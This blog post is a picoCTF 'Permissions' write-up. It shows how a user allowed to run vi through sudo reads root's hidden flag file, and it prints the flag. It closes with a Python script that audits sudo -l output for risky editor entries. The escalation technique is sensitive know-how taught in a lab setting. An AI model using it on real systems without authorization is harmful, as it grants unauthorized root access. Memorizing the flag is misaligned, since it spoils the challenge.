2024 iThome Ironman Contest

Security

picoCTF series, part 25

[Day 25] Permissions


The challenge asks whether we can read the files in root, and the hint tells us to pay attention to what permissions we have.
https://ithelp.ithome.com.tw/upload/images/20240922/20168342N5UF182W6k.png
Hint 1: What permissions do you have?

After connecting from the webshell, we first look at what is in the current directory and find that it is empty.

$ ssh -p 64096 picoplayer@saturn.picoctf.net
The authenticity of host '[saturn.picoctf.net]:49657 ([13.59.203.175]:49657)' can't be established.
ED25519 key fingerprint is SHA256:HKm/Bw1C+mhj23vO8tXULrgLFYvzP6gQH2IwgUiQTok.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[saturn.picoctf.net]:49657' (ED25519) to the list of known hosts.
picoplayer@saturn.picoctf.net's password: 
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 6.5.0-1023-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

picoplayer@challenge:~$ ls
picoplayer@challenge:~$ 

So we go up one level to the home directory, where we see a directory named picoplayer. Listing picoplayer shows nothing, which confirms that picoplayer is the directory we were just in.

picoplayer@challenge:~$ cd ..
picoplayer@challenge:/home$ ls 
picoplayer
picoplayer@challenge:/home$ ls picoplayer/

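Going up one more level brings us to the root of the filesystem, which contains the root directory mentioned in the challenge along with many other entries.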

picoplayer@challenge:/home$ cd ..
picoplayer@challenge:/$ ls -l
total 0
lrwxrwxrwx   1 root   root      7 Mar  8  2023 bin -> usr/bin
drwxr-xr-x   2 root   root      6 Apr 15  2020 boot
d---------   1 root   root     27 Aug  4  2023 challenge
drwxr-xr-x   5 root   root    340 Aug  3 15:24 dev
drwxr-xr-x   1 root   root     66 Aug  3 15:24 etc
drwxr-xr-x   1 root   root     24 Aug  4  2023 home
lrwxrwxrwx   1 root   root      7 Mar  8  2023 lib -> usr/lib
lrwxrwxrwx   1 root   root      9 Mar  8  2023 lib32 -> usr/lib32
lrwxrwxrwx   1 root   root      9 Mar  8  2023 lib64 -> usr/lib64
lrwxrwxrwx   1 root   root     10 Mar  8  2023 libx32 -> usr/libx32
drwxr-xr-x   2 root   root      6 Mar  8  2023 media
drwxr-xr-x   2 root   root      6 Mar  8  2023 mnt
drwxr-xr-x   2 root   root      6 Mar  8  2023 opt
dr-xr-xr-x 385 nobody nogroup   0 Aug  3 15:24 proc
drwx------   1 root   root     23 Aug  4  2023 root
drwxr-xr-x   1 root   root     54 Aug  3 15:25 run
lrwxrwxrwx   1 root   root      8 Mar  8  2023 sbin -> usr/sbin
drwxr-xr-x   2 root   root      6 Mar  8  2023 srv
dr-xr-xr-x  13 nobody nogroup   0 Aug  3 15:24 sys
drwxrwxrwt   1 root   root      6 Aug  4  2023 tmp
drwxr-xr-x   1 root   root     18 Mar  8  2023 usr
drwxr-xr-x   1 root   root     17 Mar  8  2023 var

The permissions on root are rwx------, which means only the owner can read, write, and execute; group and other have no permissions at all.

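Since we have no permission to do anything with the root directory, we try chmod to change the directory's permissions, and find that this does not work either.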

picoplayer@challenge:/$ chmod +x root
chmod: changing permissions of 'root': Operation not permitted

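Lacking permission brings sudo to mind, because sudo lets a user run a program or command with superuser (root) privileges.

We try sudo -i and sudo su to see whether we can log in as the root user, and find that neither works.

(Note: the difference between sudo -i and sudo su is that sudo -i simulates a full login, including reading the root user's environment variables and configuration files, while sudo su simply switches to the root user.)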

picoplayer@challenge:/$ sudo -i
[sudo] password for picoplayer:
Sorry, user picoplayer is not allowed to execute '/bin/bash' as root on challenge.
picoplayer@challenge:/$ sudo su
[sudo] password for picoplayer:
Sorry, user picoplayer is not allowed to execute '/usr/bin/su' as root on challenge.

So we run sudo -l to see which commands we are allowed to run through sudo, and find that sudo vi is allowed.

picoplayer@challenge:/$ sudo -l
[sudo] password for picoplayer:
Matching Defaults entries for picoplayer on challenge:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin\:/sbin:/bin:/snap/bin

User picoplayer may run the following commands on challenge:
    (ALL) /usr/bin/vi

Knowing that sudo vi is available, we run sudo vi /root to browse the contents of root, and find flag.txt there (listed as .flag.txt).

" ============================================================================
" Netrw Directory Listing (netrw v165)
" /root
" Sorted by name
" Sort sequence: [/]$,<core%(.\d+)=>,.h$,.c$,.cpp$,~=*$,*,.o$,
" Quick Help: :help -:go up dir D:delete R:rename s:sort-by x:specia
" =============================================================================
../
./
.vim/
.bashrc
.flag.txt
.profile
~
~
~
~
~
~
~
~
~
~
~
~
~
"/" is a directory                                               8,1                All 

Next, move the cursor to the flag.txt line and press Enter to open flag.txt and read the flag.

picoCTF{uS1ng_v1m_3dit0r_89e9cf1a} 
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
"/.flag.txt" 1L, 35C 1,1 All

Summary:

Learned sudo -l, sudo -i, and sudo su, as well as using sudo vi <file>.
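
The `(ALL) /usr/bin/vi` entry reported by sudo -l is what made root's files readable here. The following is an added example, not part of the original post: a small audit that reads `sudo -l` output and flags editor or pager entries of that kind. The `FILE_OPENERS` list and the two extra sample entries (a NOEXEC entry limited to one file, and a sudoedit entry) are assumptions constructed for comparison.

```python
import re

# Constructed sample: the entry from the challenge's `sudo -l` output,
# followed by two constructed, more tightly scoped entries for comparison.
SUDO_L = """\
User picoplayer may run the following commands on challenge:
    (ALL) /usr/bin/vi
    (root) NOEXEC: /usr/bin/vi /etc/hosts
    (root) NOPASSWD: sudoedit /etc/motd
"""

# Programs that open whatever path they are given and can also start other
# programs. Assumed, non-exhaustive list for this example.
FILE_OPENERS = {"vi", "vim", "view", "nano", "emacs", "less", "more", "ed"}

# "    (runas) TAG: TAG: command args..."
ENTRY = re.compile(
    r"^\s+\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>.+)$"
)

def parse_entries(text):
    """Return (runas, tags, argv) for each command line of `sudo -l` output."""
    entries = []
    for line in text.splitlines():
        m = ENTRY.match(line)
        if m:
            tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
            entries.append((m.group("runas"), tags, m.group("cmd").split()))
    return entries

def audit(text):
    """Flag editor/pager entries that grant more than one fixed file."""
    findings = []
    for runas, tags, argv in parse_entries(text):
        if argv[0].rsplit("/", 1)[-1] not in FILE_OPENERS:
            continue
        issues = []
        if len(argv) == 1:  # no argument list in sudoers means any arguments
            issues.append(f"any path can be opened as {runas}")
        if "NOEXEC" not in tags:
            issues.append("child processes allowed (no NOEXEC)")
        if issues:
            findings.append((argv[0], issues))
    return findings

if __name__ == "__main__":
    for cmd, issues in audit(SUDO_L):
        print(cmd, "->", "; ".join(issues))
```

Only the challenge's entry is reported; the NOEXEC entry bound to a single file and the sudoedit entry pass the check.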

